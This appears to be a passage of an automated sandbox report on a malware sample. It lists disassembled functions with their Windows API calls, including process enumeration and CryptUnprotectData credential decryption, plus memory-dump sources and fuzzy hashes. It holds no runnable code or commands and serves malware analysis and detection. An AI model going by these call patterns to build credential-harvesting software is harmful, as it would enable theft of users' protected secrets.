                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: b758a278dbc8e5a22d2c2ddb9b0724da24c92eb0ce2a84fae8cb61990adf4de0
                      • Instruction ID: 6c7f6a1e21e462dc8bb78220cb2dd2f208b7b51c8a7ec28f75d2944c59cc4730
                      • Opcode Fuzzy Hash: b758a278dbc8e5a22d2c2ddb9b0724da24c92eb0ce2a84fae8cb61990adf4de0
                      • Instruction Fuzzy Hash: 53011275A41208BBDB14DFD8DD49FEE7779EB44700F148555FB05AB2C0D670AA008B65
                      Function 003E9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003E961E
                      • Process32First.KERNEL32(003F0ACA,00000128), ref: 003E9632
                      • Process32Next.KERNEL32(003F0ACA,00000128), ref: 003E9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 003E965C
                      • CloseHandle.KERNEL32(003F0ACA), ref: 003E967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 16304f16109ee907071c90459025b5b109588e1dd2207db4d528b4af6e6db587
                      • Instruction ID: 3b34d0c39fea4aba123bff47f818c5ae59d54fcd4ce032cd1f27702966032c2b
                      • Opcode Fuzzy Hash: 16304f16109ee907071c90459025b5b109588e1dd2207db4d528b4af6e6db587
                      • Instruction Fuzzy Hash: BB011E75A11218EBCB15DFA5CD48BEDB7F9EB48310F14829AA90597290D7349B40CF51
                      Function 00791B19 Relevance: 6.6, Strings: 4, Instructions: 1607COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,E{y$G]nq$G7]$>?
                      • API String ID: 0-2092499514
                      • Opcode ID: ed2d1e93aba618268a2f7468d0e0dfb40e0b6ec982edab7c436f3f3f1307ff77
                      • Instruction ID: 051ff00498c51ab86b788d8aac8104403595434974cd8dfaa0cf16b00a091fba
                      • Opcode Fuzzy Hash: ed2d1e93aba618268a2f7468d0e0dfb40e0b6ec982edab7c436f3f3f1307ff77
                      • Instruction Fuzzy Hash: 80B205F360C2109FE305AE2DEC8567ABBE9EF94320F16493DEAC5C7740E63598418697
                      Function 00793C7A Relevance: 6.1, Strings: 4, Instructions: 1090COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0"7$8,_+$uD&;$67
                      • API String ID: 0-2140114596
                      • Opcode ID: 516c79891ce18c190ad9c3765d8033bc766cf3474fcd0b19a40952b04de8d6a0
                      • Instruction ID: a49ec95121aa154d6cae3beaf77cf89416162da998a751346c3cd9b8c0dbfd49
                      • Opcode Fuzzy Hash: 516c79891ce18c190ad9c3765d8033bc766cf3474fcd0b19a40952b04de8d6a0
                      • Instruction Fuzzy Hash: 8472E8F3A0C300AFE304AE29ECC566AB7E9EF94720F1A453DEAC4C7744E67558118697
                      Function 003E8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,003D5184,40000001,00000000,00000000,?,003D5184), ref: 003E8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: 80149a8d2b2696aa54adc0539d82a5495cfefb9b379e3c6e395a3267861d833b
                      • Instruction ID: 459386d823244867dee8f20f8a5cd7cacb05c33f3aa6b785524b1f4245502c5a
                      • Opcode Fuzzy Hash: 80149a8d2b2696aa54adc0539d82a5495cfefb9b379e3c6e395a3267861d833b
                      • Instruction Fuzzy Hash: 36112E70600244FFDB01CFA5E884FA733AAAF89300F149648F9198B290DB35EC42DB60
                      Function 003E7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0108DF20,00000000,?,003F0E10,00000000,?,00000000,00000000), ref: 003E7A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0108DF20,00000000,?,003F0E10,00000000,?,00000000,00000000,?), ref: 003E7A7D
                      • wsprintfA.USER32 ref: 003E7AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 9062ba8c8fe3d7bfa293daaf774ce0e70971d8b7aa02b343cb49ed56fc3330f9
                      • Instruction ID: 4b36ae3861bd7231dc02f2ba4bbe6ea0bc49c3fda59a4b575ac2e031fd61c211
                      • Opcode Fuzzy Hash: 9062ba8c8fe3d7bfa293daaf774ce0e70971d8b7aa02b343cb49ed56fc3330f9
                      • Instruction Fuzzy Hash: 71115EB1D46268EBEB20CF55DC49FA9B778FB04721F1043AAE91A932C0D7745A40CF91
                      Function 0078EF9C Relevance: 5.8, Strings: 4, Instructions: 777COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "u}$@Gm[$QB=Y$v;
                      • API String ID: 0-3572847674
                      • Opcode ID: e1c80920b61a822c98d93836a90c1ece204e1ff81807283efdbe243fbfaf88a2
                      • Instruction ID: c2082808b45f3ad0a876ec9e58c1048a453288067ab2fc668bfcd5f8e016eee2
                      • Opcode Fuzzy Hash: e1c80920b61a822c98d93836a90c1ece204e1ff81807283efdbe243fbfaf88a2
                      • Instruction Fuzzy Hash: 5F42E4F260C6009FE304AF29DD8567AFBE5EF94320F16893DE6C487744EA3598448B97
                      Function 0078B779 Relevance: 4.8, Strings: 3, Instructions: 1065COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: PF,$dK?$'o|
                      • API String ID: 0-809057215
                      • Opcode ID: a5a66da508000ed30edab9281cbe60442126577738b5e1df2ef60f3c5490d56b
                      • Instruction ID: ca0fc5fca486e03cd59f375dc4c6100fa366ac0b1d5110a3fd970b8a895ace51
                      • Opcode Fuzzy Hash: a5a66da508000ed30edab9281cbe60442126577738b5e1df2ef60f3c5490d56b
                      • Instruction Fuzzy Hash: 5A72F3F390C2009FE304AF29EC8567AFBE5EFD4720F16892DE6C5C7744E63598058A96
                      Function 003E3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(003EE118,00000000,00000001,003EE108,00000000), ref: 003E3758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003E37B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: aba067613e6609a2cfae74de553338e01a3f57a4997bbd798d1c2e3477f5a5e1
                      • Instruction ID: 2b8848b76ce4c8a894ed4f1be94efa16e0cbcb74296cb4370cc17e84e3449437
                      • Opcode Fuzzy Hash: aba067613e6609a2cfae74de553338e01a3f57a4997bbd798d1c2e3477f5a5e1
                      • Instruction Fuzzy Hash: AC41D974A40A289FDB24DB54CC99BDBB7B5BB48702F4092D8E608AB2D0D7716E85CF50
                      Function 003D9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003D9B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 003D9BA3
                      • LocalFree.KERNEL32(?), ref: 003D9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 7d7bc64edbd56578a410761b5bed1f84096a2f3a62c39831b2e42a119560d007
                      • Instruction ID: 3263c7a0ffa26b4636d2681b20fdfc946045d58a21acf4905eef33b2656c6b86
                      • Opcode Fuzzy Hash: 7d7bc64edbd56578a410761b5bed1f84096a2f3a62c39831b2e42a119560d007
                      • Instruction Fuzzy Hash: D5110CB8A00209DFDB04DFA4D985AAE77B5FF88300F10455AF81597350D770AE10CF61
                      Function 00787BC1 Relevance: 4.1, Strings: 2, Instructions: 1613COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0$y7$f4_
                      • API String ID: 0-2366434797
                      • Opcode ID: 60ee1baf2cfaca6d97f61cf8225b978ce259cad4282436302bb1e743053324fc
                      • Instruction ID: 9ea682d627e4c1a7cd13641714c7a283bf92fe6453d05ca0f9a12b00d671a165
                      • Opcode Fuzzy Hash: 60ee1baf2cfaca6d97f61cf8225b978ce259cad4282436302bb1e743053324fc
                      • Instruction Fuzzy Hash: 7EB2F7F3A08600AFE7046E2DEC8567ABBE9EF94720F1A493DE6C4C3744E97558418693
                      Function 007865D2 Relevance: 3.7, Strings: 2, Instructions: 1189COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
